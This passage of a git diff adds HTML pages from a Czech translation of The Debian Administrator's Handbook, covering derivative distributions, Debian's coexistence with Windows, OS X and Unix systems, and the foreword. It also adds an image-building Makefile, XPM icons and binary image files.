+              class="indexterm"></a> Many Linux distributions are derivatives of Debian and reuse Debian's package management tools. They all have their own interesting properties, and it is possible one of them will fulfill your needs better than Debian itself.
+	</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.derivative-census"></a>A.1. Census and Cooperation</h2></div></div></div><div
+            class="para">
+			The Debian project fully acknowledges the importance of derivative distributions and actively supports collaboration between all involved parties. This usually involves merging back the improvements initially developed by derivative distributions so that everyone can benefit and long-term maintenance work is reduced.
+		</div><div
+            class="para">
+			This explains why derivative distributions are invited to become involved in discussions on the <code
+              class="literal">debian-derivatives@lists.debian.org</code> mailing-list, and to participate in the derivative census. This census aims at collecting information on work happening in a derivative so that official Debian maintainers can better track the state of their package in Debian variants. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://wiki.debian.org/DerivativesFrontDesk">https://wiki.debian.org/DerivativesFrontDesk</a></div><div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://wiki.debian.org/Derivatives/Census">https://wiki.debian.org/Derivatives/Census</a></div>
+		</div><div
+            class="para">
+			Let us now briefly describe the most interesting and popular derivative distributions.
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.future-of-this-book.html"><strong>Předcházející</strong>16.3. Future of this Book</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.ubuntu.html"><strong>Další</strong>A.2. Ubuntu</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/existing-setup.html b/tmp/cs-CZ/html/existing-setup.html
new file mode 100644
index 000000000..ba25fae78
--- /dev/null
+++ b/tmp/cs-CZ/html/existing-setup.html
@@ -0,0 +1,175 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Kapitola 3. Analyzing the Existing Setup and Migrating</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Existing Setup, Reuse, Migration" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="sect.why-debian-stable.html"
+        title="2.5. Why Debian Stretch?" /><link
+        rel="next"
+        href="sect.how-to-migrate.html"
+        title="3.2. How To Migrate" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/existing-setup.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.why-debian-stable.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.how-to-migrate.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="chapter"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="existing-setup"></a>Kapitola 3. Analyzing the Existing Setup and Migrating</h1></div></div></div><div
+          class="toc"><dl
+            class="toc"><dt><span
+                class="section"><a
+                  href="existing-setup.html#sect.heterogeneous-environments">3.1. Coexistence in Heterogeneous Environments</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="existing-setup.html#id-1.6.4.4">3.1.1. Integration with Windows Machines</a></span></dt><dt><span
+                    class="section"><a
+                      href="existing-setup.html#id-1.6.4.5">3.1.2. Integration with OS X machines</a></span></dt><dt><span
+                    class="section"><a
+                      href="existing-setup.html#id-1.6.4.6">3.1.3. Integration with Other Linux/Unix Machines</a></span></dt></dl></dd><dt><span
+                class="section"><a
+                  href="sect.how-to-migrate.html">3.2. How To Migrate</a></span></dt><dd><dl><dt><span
+                    class="section"><a
+                      href="sect.how-to-migrate.html#id-1.6.5.4">3.2.1. Survey and Identify Services</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.how-to-migrate.html#id-1.6.5.5">3.2.2. Backing up the Configuration</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.how-to-migrate.html#id-1.6.5.6">3.2.3. Taking Over an Existing Debian Server</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.how-to-migrate.html#id-1.6.5.7">3.2.4. Installing Debian</a></span></dt><dt><span
+                    class="section"><a
+                      href="sect.how-to-migrate.html#id-1.6.5.8">3.2.5. Installing and Configuring the Selected Services</a></span></dt></dl></dd></dl></div><div
+          class="highlights"><div
+            class="para">
+		Any computer system overhaul should take the existing system into account. This allows reuse of available resources as much as possible and guarantees interoperability of the various elements comprising the system. This study will introduce a generic framework to follow in any migration of a computing infrastructure to Linux.
+	</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.heterogeneous-environments"></a>3.1. Coexistence in Heterogeneous Environments</h2></div></div></div><a
+            id="id-1.6.4.2"
+            class="indexterm"></a><div
+            class="para">
+			Debian integrates very well in all types of existing environments and plays well with any other operating system. This near-perfect harmony comes from market pressure which demands that software publishers develop programs that follow standards. Compliance with standards allows administrators to switch out programs: clients or servers, whether free or not.
+		</div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.6.4.4"></a>3.1.1. Integration with Windows Machines</h3></div></div></div><div
+              class="para">
+				Samba's SMB/CIFS support ensures excellent communication within a Windows context. It shares files and print queues to Windows clients and includes software that allow a Linux machine to use resources available on Windows servers.
+			</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>TOOL</em></span> Samba</strong></p></div></div></div><a
+                id="id-1.6.4.4.3.2"
+                class="indexterm"></a><div
+                class="para">
+				The latest version of Samba can replace most of the Windows features: from those of a simple Windows NT server (authentication, files, print queues, downloading printer drivers, DFS, etc.) to the most advanced one (a domain controller compatible with Active Directory).
+			</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.6.4.5"></a>3.1.2. Integration with OS X machines</h3></div></div></div><a
+              id="id-1.6.4.5.2"
+              class="indexterm"></a><a
+              id="id-1.6.4.5.3"
+              class="indexterm"></a><a
+              id="id-1.6.4.5.4"
+              class="indexterm"></a><div
+              class="para">
+				OS X machines provide, and are able to use, network services such as file servers and printer sharing. These services are published on the local network, which allows other machines to discover them and make use of them without any manual configuration, using the Bonjour implementation of the Zeroconf protocol suite. Debian includes another implementation, called Avahi, which provides the same functionality.
+			</div><a
+              id="id-1.6.4.5.6"
+              class="indexterm"></a><a
+              id="id-1.6.4.5.7"
+              class="indexterm"></a><div
+              class="para">
+				In the other direction, the Netatalk daemon can be used to provide file servers to OS X machines on the network. It implements the AFP (AppleShare) protocol as well as the required notifications so that the servers can be autodiscovered by the OS X clients.
+			</div><a
+              id="id-1.6.4.5.9"
+              class="indexterm"></a><div
+              class="para">
+				Older Mac OS networks (before OS X) used a different protocol called AppleTalk. For environments involving machines using this protocol, Netatalk also provides the AppleTalk protocol (in fact, it started as a reimplementation of that protocol). It ensures the operation of the file server and print queues, as well as time server (clock synchronization). Its router function allows interconnection with AppleTalk networks.
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h3
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.6.4.6"></a>3.1.3. Integration with Other Linux/Unix Machines</h3></div></div></div><div
+              class="para">
+				Finally, NFS and NIS, both included, guarantee interaction with Unix systems. NFS ensures file server functionality, while NIS creates user directories. The BSD printing layer, used by most Unix systems, also allows sharing of print queues.
+			</div><div
+              class="figure"><a
+                xmlns=""
+                id="id-1.6.4.6.3"></a><div
+                class="figure-contents"><div
+                  class="mediaobject"><img
+                    src="images/existing-setup-1.png"
+                    alt="Coexistence of Debian with OS X, Windows and Unix systems" /></div></div><p
+                class="title"><strong>Obrázek 3.1. Coexistence of Debian with OS X, Windows and Unix systems</strong></p></div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.why-debian-stable.html"><strong>Předcházející</strong>2.5. Why Debian Stretch?</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.how-to-migrate.html"><strong>Další</strong>3.2. How To Migrate</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/foreword.html b/tmp/cs-CZ/html/foreword.html
new file mode 100644
index 000000000..01ed8c1d4
--- /dev/null
+++ b/tmp/cs-CZ/html/foreword.html
@@ -0,0 +1,136 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">Předmluva</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="prev"
+        href="preface.html"
+        title="Úvodní slovo" /><link
+        rel="next"
+        href="sect.who-is-this-book-for.html"
+        title="2. Pro koho je tato kniha?" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/foreword.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="preface.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.who-is-this-book-for.html"><strong>Další</strong></a></li></ul><div
+        xml:lang="cs-CZ"
+        class="preface"
+        lang="cs-CZ"><div
+          class="titlepage"><div><div><h1
+                class="title"><a
+                  xmlns=""
+                  id="foreword"></a>Předmluva</h1></div></div></div><div
+          class="para">
+		Linux nabíral na síle po řadu let, a jeho rostoucí popularita pobízí více a více uživatelů, aby učinili tento skok. Prvním krokem na této cestě je vybrat distribuci. To je důležité rozhodnutí, protože každá distribuce má své vlastní zvláštnosti, a budoucím nákladům na migraci se lze vyhnout, pokud je učiněna správná volba již od začátku.
+	</div><div
+          class="sidebar"><div
+            class="titlepage"><div><div><p
+                  class="title"><strong><span
+                      class="emphasis"><em>ZPĚT K ZÁKLADŮM</em></span> Linuxová distribuce, linuxové jádro</strong></p></div></div></div><a
+            id="id-1.3.3.2"
+            class="indexterm"></a><a
+            id="id-1.3.3.3"
+            class="indexterm"></a><a
+            id="id-1.3.3.4"
+            class="indexterm"></a><div
+            class="para">
+		Striktně vzato, Linux je pouze jádro, jádro je kus softwaru, který sídlí mezi hardwarem a aplikací.
+	</div><div
+            class="para">
+		“Linuxová distribuce” je úplný operační systém; To obvykle zahrnuje linuxové jádro, instalační program, a co je nejdůležitější aplikace a další software potřebný k proměně počítače na skutečně užitečný nástroj.
+	</div></div><div
+          class="para">
+		Debian GNU/Linux je “typická” linuxová distribuce, která se hodí pro většinu uživatelů. Účelem této knihy je ukázat mnoho jejích aspektů, aby jste mohli učinit rozhodnutí založené na co nejvíce informacích.
+	</div><div
+          class="section"><div
+            class="titlepage"><div><div><h2
+                  class="title"><a
+                    xmlns=""
+                    id="sect.why-this-book"></a>1. Proč tato kniha?</h2></div></div></div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>KULTURA</em></span> Komerční distribuce</strong></p></div></div></div><a
+              id="id-1.3.5.2.2"
+              class="indexterm"></a><div
+              class="para">
+			Most Linux distributions are backed by a for-profit company that develops them and sells them under some kind of commercial scheme. Examples include <span
+                class="emphasis"><em>Ubuntu</em></span>, mainly developed by <span
+                class="emphasis"><em>Canonical Ltd.</em></span>; <span
+                class="emphasis"><em>Red Hat Enterprise Linux</em></span>, by <span
+                class="emphasis"><em>Red Hat</em></span>; and <span
+                class="emphasis"><em>SUSE Linux</em></span>, maintained and made commercially available by <span
+                class="emphasis"><em>Novell</em></span>.
+		</div><div
+              class="para">
+			Na druhém konci spektra leží podoby Debianu a Apache Software Foundation (který zabezpečuje vývoj pro webový server Apache). Debian je především projekt ve světě svobodného softwaru, implementovaný dobrovolníky, kteří spolupracují prostřednictvím internetu. Zatímco někteří z nich pracují na Debianu jako na součásti své placené práce v různých společnostech, projekt jako celek není nijak zvlášť spojen s žádnou společností a ani žádná společnost nemá v projektu větší slovo než co mají dobrovolní přispěvatelé.
+		</div></div><div
+            class="para">
+			Linux has gathered a fair amount of media coverage over the years; it mostly benefits the distributions supported by a real marketing department — in other words, company-backed distributions (Ubuntu, Red Hat, SUSE, and so on). But Debian is far from being a marginal distribution; multiple studies have shown over the years that it is widely used both on servers and on desktops. This is particularly true among webservers where Debian and Ubuntu are the leading Linux distributions. <div
+              xmlns=""
+              class="url">→ <a
+                xmlns="http://www.w3.org/1999/xhtml"
+                href="https://w3techs.com/technologies/details/os-debian/all/all">https://w3techs.com/technologies/details/os-debian/all/all</a></div>
+		</div><div
+            class="para">
+			Účelem této knihy je pomoci vám poznat tuto distribuci. Doufáme, že se nám podaří sdílet zkušenosti, které jsme nashromáždili od doby, kdy jsme se připojili k projektu jako vývojáři a přispěvatelé v roce 1998 (Raphaël) a v roce 2000 (Roland). S trochou štěstí bude naše nadšení nakažlivé a možná se k nám někdy připojíte...
+		</div><div
+            class="para">
+			První vydání této knihy (v roce 2004) sloužilo k vyplnění mezery: byla to první kniha ve francouzském jazyce, která se zaměřila výhradně na Debian. V té době, mnoho dalších knih bylo napsáno na toto téma jak pro francouzsky mluvící, tak i pro anglicky mluvící čtenáře. Bohužel téměř žádné z nich se nedostávalo aktualizací, a v průběhu let situace sklouzla zpět do pozice, kdy bylo o Debianu jen velmi málo dobrých knih. Doufáme, že tato kniha, která začala svůj nový život překladem do angličtiny (a několika překlady z angličtiny do různých jiných jazyků), zaplní tuto mezeru a pomůže mnoha uživatelům.
+		</div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="preface.html"><strong>Předcházející</strong>Úvodní slovo</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.who-is-this-book-for.html"><strong>Další</strong>2. Pro koho je tato kniha?</a></li></ul></body></html>
diff --git a/tmp/cs-CZ/html/images/Makefile b/tmp/cs-CZ/html/images/Makefile
new file mode 100644
index 000000000..112420b8b
--- /dev/null
+++ b/tmp/cs-CZ/html/images/Makefile
@@ -0,0 +1,17 @@
+
+dia = $(wildcard *.dia)
+
+all: png
+
+png: $(patsubst %.dia,%.png,$(dia))
+
+eps: $(patsubst %.jpg,%.eps,$(wildcard *.jpg)) $(patsubst %.png,%.eps,$(wildcard *.png)) $(patsubst %.dia,%.eps,$(dia))
+
+define DIA_template
+$(1).png: $(1).dia
+	dia -t png -s 1024 $$<
+endef
+
+$(foreach d,$(patsubst %.dia,%,$(dia)),$(eval $(call DIA_template,$(d))))
+
+.PHONY: png all
diff --git a/tmp/cs-CZ/html/images/apple.xpm b/tmp/cs-CZ/html/images/apple.xpm
new file mode 100644
index 000000000..bd976feb5
--- /dev/null
+++ b/tmp/cs-CZ/html/images/apple.xpm
@@ -0,0 +1,34 @@
+/* XPM */
+static char * apple_xpm[] = {
+"28 24 7 1",
+" 	c #ff9ebe",
+".	c #3c9e3c",
+"X	c #ffff00",
+"o	c #ffbe7d",
+"O	c #ff0000",
+"+	c #7d3cbe",
+"@	c #0000ff",
+"               ....         ",
+"              ....          ",
+"              ....          ",
+"              ...           ",
+"        ..    .   ..        ",
+"      ......    ......      ",
+"     ..................     ",
+"     ..................     ",
+"    XXXXXXXXXXXXXXXXX       ",
+"    XXXXXXXXXXXXXXXX        ",
+"    XXXXXXXXXXXXXXXX        ",
+"    oooooooooooooooo        ",
+"    oooooooooooooooo        ",
+"    oooooooooooooooo        ",
+"    OOOOOOOOOOOOOOOOO       ",
+"     OOOOOOOOOOOOOOOOO      ",
+"     OOOOOOOOOOOOOOOOOO     ",
+"     +++++++++++++++++      ",
+"      ++++++++++++++++      ",
+"      +++++++++++++++       ",
+"       @@@@@@@@@@@@@@       ",
+"        @@@@@@@@@@@@        ",
+"          @@    @@          ",
+"                            "};
diff --git a/tmp/cs-CZ/html/images/aptitude.png b/tmp/cs-CZ/html/images/aptitude.png
new file mode 100644
index 000000000..f9cfb9efe
Binary files /dev/null and b/tmp/cs-CZ/html/images/aptitude.png differ
diff --git a/tmp/cs-CZ/html/images/autobuilder.dia b/tmp/cs-CZ/html/images/autobuilder.dia
new file mode 100644
index 000000000..2fa55396c
Binary files /dev/null and b/tmp/cs-CZ/html/images/autobuilder.dia differ
diff --git a/tmp/cs-CZ/html/images/autobuilder.png b/tmp/cs-CZ/html/images/autobuilder.png
new file mode 100644
index 000000000..575ef330d
Binary files /dev/null and b/tmp/cs-CZ/html/images/autobuilder.png differ
diff --git a/tmp/cs-CZ/html/images/bsdcpu.xpm b/tmp/cs-CZ/html/images/bsdcpu.xpm
new file mode 100644
index 000000000..832b780bc
--- /dev/null
+++ b/tmp/cs-CZ/html/images/bsdcpu.xpm
@@ -0,0 +1,60 @@
+/* XPM */
+static char * bsdcpu_xpm[] = {
+"55 45 11 1",
+"      c #888888",
+".     c None",
+"X     c #cccccc",
+"o     c #bbbbbb",
+"O     c #000000",
+"+     c #eeeeee",
+"@     c #cd5c5c",
+"#     c #32cd32",
+"$     c #999999",
+"%     c #666666",
+"&     c #555555",
+"                                    ...................",
+" XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ...................",
+" XooooooooooooooooooooooooooooooooX ...................",
+" Xo                              oX ...................",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ...................",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ...................",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX .....          ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +@@+###+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +@O+##O+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +oooooo+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +oOoooo+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +oOoooo+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +oooooo+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +oOoooo+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +oOoooo+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +$$$$$$+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... +$$$$$$+ ....",
+" Xo OOOOOOOOOOOOOOOOOOOOOOOOOOOO oX ..... ++++++++ ....",
+" Xo                              oX ..... +$$$$$$+ ....",
+" XooooooooooooooooooooooooooooooooX ..... ++++++++ ....",
+" XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX .....          ....",
+"                                    ..... oooooooo ....",
+"... % % % % % % % % % % % % % % %........ oooooooo ....",
+"... % % % % % % % % % % % % % % %........          ....",
+"......&&%%%%%%%%%%%%%%%%%%%%&&............        .....",
+"......&&&&&%%%%%%%%%%%%%%&&&&&.........................",
+"                                     ......   .........",
+" XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX .  ... ... ........",
+" Xo+++++++++++++++++++oooXXXXXooooX ...   .       .....",
+" Xoo+++++++++++++++++++ooXXoXX+++oX ....... X X X .....",
+" Xoooo+++++++++++++++ooooXoooX+++oX ....... X X X .....",
+" X$$$$$$$$$$$$$$$$$$$$$$$X$$$X$$$$X .......       .....",
+" XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX ....... XXXXX .....",
+" oooooooooooooooooooooooooooooooooo ....... XXXXX .....",
+"                                    .......       ....."};
+
diff --git a/tmp/cs-CZ/html/images/case-study.dia b/tmp/cs-CZ/html/images/case-study.dia
new file mode 100644
index 000000000..9e65a8775
Binary files /dev/null and b/tmp/cs-CZ/html/images/case-study.dia differ
diff --git a/tmp/cs-CZ/html/images/case-study.png b/tmp/cs-CZ/html/images/case-study.png
new file mode 100644
index 000000000..8d1e14b2d
Binary files /dev/null and b/tmp/cs-CZ/html/images/case-study.png differ
diff --git a/tmp/cs-CZ/html/images/chap-advanced-administration.png b/tmp/cs-CZ/html/images/chap-advanced-administration.png
new file mode 100644
index 000000000..392045bf9
Binary files /dev/null and b/tmp/cs-CZ/html/images/chap-advanced-administration.png differ
diff --git a/tmp/cs-CZ/html/images/chap-apt.png b/tmp/cs-CZ/html/images/chap-apt.png
new file mode 100644
index 000000000..493eb5808
Binary files /dev/null and b/tmp/cs-CZ/html/images/chap-apt.png differ
diff --git a/tmp/cs-CZ/html/images/chap-basic-configuration.png b/tmp/cs-CZ/html/images/chap-basic-configuration.png
new file mode 100644
index 000000000..7d48ab683
Binary files /dev/null and b/tmp/cs-CZ/html/images/chap-basic-configuration.png differ
diff --git a/tmp/cs-CZ/html/images/chap-case-study.png b/tmp/cs-CZ/html/images/chap-case-study.png
new file mode 100644
index 000000000..379523300
Binary files /dev/null and b/tmp/cs-CZ/html/images/chap-case-study.png differ
diff --git a/tmp/cs-CZ/html/images/chap-conclusion.png b/tmp/cs-CZ/html/images/chap-conclusion.png
new file mode 100644
index 000000000..8603f73ff
Binary files /dev/null and b/tmp/cs-CZ/html/images/chap-conclusion.png differ
diff --git a/tmp/cs-CZ/html/images/chap-debian-packaging.png b/tmp/cs-CZ/html/images/chap-debian-packaging.png
new file mode 100644
index 000000000..830cb3b7a
Binary files /dev/null and b/tmp/cs-CZ/html/images/chap-debian-packaging.png differ
diff --git a/tmp/cs-CZ/html/images/chap-derivative-distributions.png b/tmp/cs-CZ/html/images/chap-derivative-distributions.png
new file mode 100644
index 000000000..22051ec06
Binary files /dev/null and b/tmp/cs-CZ/html/images/chap-derivative-distributions.png differ
diff --git a/tmp/cs-CZ/html/images/chap-existing-setup.png b/tmp/cs-CZ/html/images/chap-existing-setup.png
new file mode 100644
index 000000000..dd99621f1
Binary files /dev/null and b/tmp/cs-CZ/html/images/chap-existing-setup.png differ
diff --git a/tmp/cs-CZ/html/images/chap-installation.png b/tmp/cs-CZ/html/images/chap-installation.png
new file mode 100644
index 000000000..16ab65980
Binary files /dev/null and b/tmp/cs-CZ/html/images/chap-installation.png differ
diff --git a/tmp/cs-CZ/html/images/chap-network-infrastructure.png b/tmp/cs-CZ/html/images/chap-network-infrastructure.png
new file mode 100644
index 000000000..cb6775d3c
Binary files /dev/null and b/tmp/cs-CZ/html/images/chap-network-infrastructure.png differ
diff --git a/tmp/cs-CZ/html/images/chap-network-services.png b/tmp/cs-CZ/html/images/chap-network-services.png
new file mode 100644
index 000000000..c74c3df36
Binary files /dev/null and b/tmp/cs-CZ/html/images/chap-network-services.png differ
diff --git a/tmp/cs-CZ/html/images/chap-packaging-system.png b/tmp/cs-CZ/html/images/chap-packaging-system.png
new file mode 100644
index 000000000..538474b86
Binary files /dev/null and b/tmp/cs-CZ/html/images/chap-packaging-system.png differ
diff --git a/tmp/cs-CZ/html/images/chap-security.png b/tmp/cs-CZ/html/images/chap-security.png
new file mode 100644
index 000000000..43c2bb605
Binary files /dev/null and b/tmp/cs-CZ/html/images/chap-security.png differ
diff --git a/tmp/cs-CZ/html/images/chap-short-remedial-course.png b/tmp/cs-CZ/html/images/chap-short-remedial-course.png
new file mode 100644
index 000000000..3293f610e
Binary files /dev/null and b/tmp/cs-CZ/html/images/chap-short-remedial-course.png differ
diff --git a/tmp/cs-CZ/html/images/chap-solving-problems.png b/tmp/cs-CZ/html/images/chap-solving-problems.png
new file mode 100644
index 000000000..793045299
Binary files /dev/null and b/tmp/cs-CZ/html/images/chap-solving-problems.png differ
diff --git a/tmp/cs-CZ/html/images/chap-the-debian-project.png b/tmp/cs-CZ/html/images/chap-the-debian-project.png
new file mode 100644
index 000000000..4b75ba44c
Binary files /dev/null and b/tmp/cs-CZ/html/images/chap-the-debian-project.png differ
diff --git a/tmp/cs-CZ/html/images/chap-unix-services.png b/tmp/cs-CZ/html/images/chap-unix-services.png
new file mode 100644
index 000000000..fe71ddc4b
Binary files /dev/null and b/tmp/cs-CZ/html/images/chap-unix-services.png differ
diff --git a/tmp/cs-CZ/html/images/chap-workstation.png b/tmp/cs-CZ/html/images/chap-workstation.png
new file mode 100644
index 000000000..395f60de6
Binary files /dev/null and b/tmp/cs-CZ/html/images/chap-workstation.png differ
diff --git a/tmp/cs-CZ/html/images/cover.jpg b/tmp/cs-CZ/html/images/cover.jpg
new file mode 100644
index 000000000..63f98f34d
Binary files /dev/null and b/tmp/cs-CZ/html/images/cover.jpg differ
diff --git a/tmp/cs-CZ/html/images/debian.png b/tmp/cs-CZ/html/images/debian.png
new file mode 100644
index 000000000..7acde5f1d
Binary files /dev/null and b/tmp/cs-CZ/html/images/debian.png differ
diff --git a/tmp/cs-CZ/html/images/debian.xpm b/tmp/cs-CZ/html/images/debian.xpm
new file mode 100644
index 000000000..e65d6697b
--- /dev/null
+++ b/tmp/cs-CZ/html/images/debian.xpm
@@ -0,0 +1,44 @@
+/* XPM */
+static char * debian_xpm[] = {
+"28 24 17 1",
+" 	c None",
+".	c #BE073B",
+"+	c #C43761",
+"@	c #D26486",
+"#	c #DC92A9",
+"$	c #E3AEBF",
+"%	c #E9BFCD",
+"&	c #EECFDA",
+"*	c #F4DEE5",
+"=	c #F6E6ED",
+"-	c #F7EDF1",
+";	c #C12855",
+">	c #C63E66",
+",	c #FEFEFE",
+"'	c #D37895",
+")	c #BE1C4A",
+"!	c #CB5276",
+",,,,,,,,,,,,,,,,,,,,,,,,,,,,",
+",,,,,,,,,,,%@!'#$-,,,,,,,,,,",
+",,,,,,,,,&>......)>$,,,,,,,,",
+",,,,,,,,#...!#$$#+..@,,,,,,,",
+",,,,,,,#..!%,,,,,,'..',,,,,,",
+",,,,,-=))#,,,,,,,,,'..%,,,,,",
+",,,,,-@.%,,,,,,,,,,-;+$,,,,,",
+",,,,,%.#,,,,,$@'$*,,'.&,,,,,",
+",,,,,'.*,,,,$#,,,-,,$.&,,,,,",
